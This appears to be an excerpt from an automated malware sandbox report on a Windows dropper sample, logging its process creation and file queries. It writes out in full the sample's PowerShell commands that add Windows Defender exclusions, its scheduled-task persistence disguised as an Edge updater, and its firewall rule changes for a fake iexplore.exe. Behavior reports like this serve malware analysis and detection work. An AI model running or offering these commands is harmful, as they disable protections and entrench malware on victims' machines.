Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeProcess token adjusted: Debug
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'"Jump to behavior
Bypasses PowerShell execution policy
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /fJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /fJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe "C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\ProgramData\Microsoft\Bound.exe "C:\ProgramData\Microsoft\Bound.exe" Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\selfdelete.bat""Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /fJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeProcess created: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" Jump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeProcess created: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe "C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" Jump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=in program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"Jump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall delete rule name=all dir=out program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe'"Jump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Inbound' dir=in action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public"Jump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "netsh advfirewall firewall add rule name='Allow Internet Explorer Outbound' dir=out action=allow program='C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe' enable=yes profile=private,public"Jump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8B5F.tmp.bat""Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=in "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall delete rule name=all dir=out "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Inbound" dir=in action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule "name=Allow Internet Explorer Outbound" dir=out action=allow "program=C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe" enable=yes profile=private,public
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -executionpolicy bypass -command "netsh advfirewall firewall add rule name='allow internet explorer inbound' dir=in action=allow program='c:\programdata\microsoft\internet explorer\iexplore.exe' enable=yes profile=private,public"
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -executionpolicy bypass -command "netsh advfirewall firewall add rule name='allow internet explorer outbound' dir=out action=allow program='c:\programdata\microsoft\internet explorer\iexplore.exe' enable=yes profile=private,public"
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -executionpolicy bypass -command "netsh advfirewall firewall add rule name='allow internet explorer inbound' dir=in action=allow program='c:\programdata\microsoft\internet explorer\iexplore.exe' enable=yes profile=private,public"Jump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -noprofile -executionpolicy bypass -command "netsh advfirewall firewall add rule name='allow internet explorer outbound' dir=out action=allow program='c:\programdata\microsoft\internet explorer\iexplore.exe' enable=yes profile=private,public"Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exeQueries volume information: C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\random VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\misc VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2 VolumeInformationJump to behavior
Source: C:\ProgramData\Microsoft\Bound.exeQueries volume information: C:\ProgramData\Microsoft\Bound.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\netsh.exeQueries volume information: C:\ VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\ucrtbase.dll VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\_ctypes.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\_bz2.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\base_library.zip VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\cv2\__init__.py VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core\_multiarray_umath.cp37-win32.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002 VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI55002\numpy\core\_multiarray_tests.cp37-win32.pyd VolumeInformation
Source: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exeQueries volume information: C:\ProgramData\Microsoft\Internet Explorer\iexplore.exe VolumeInformation
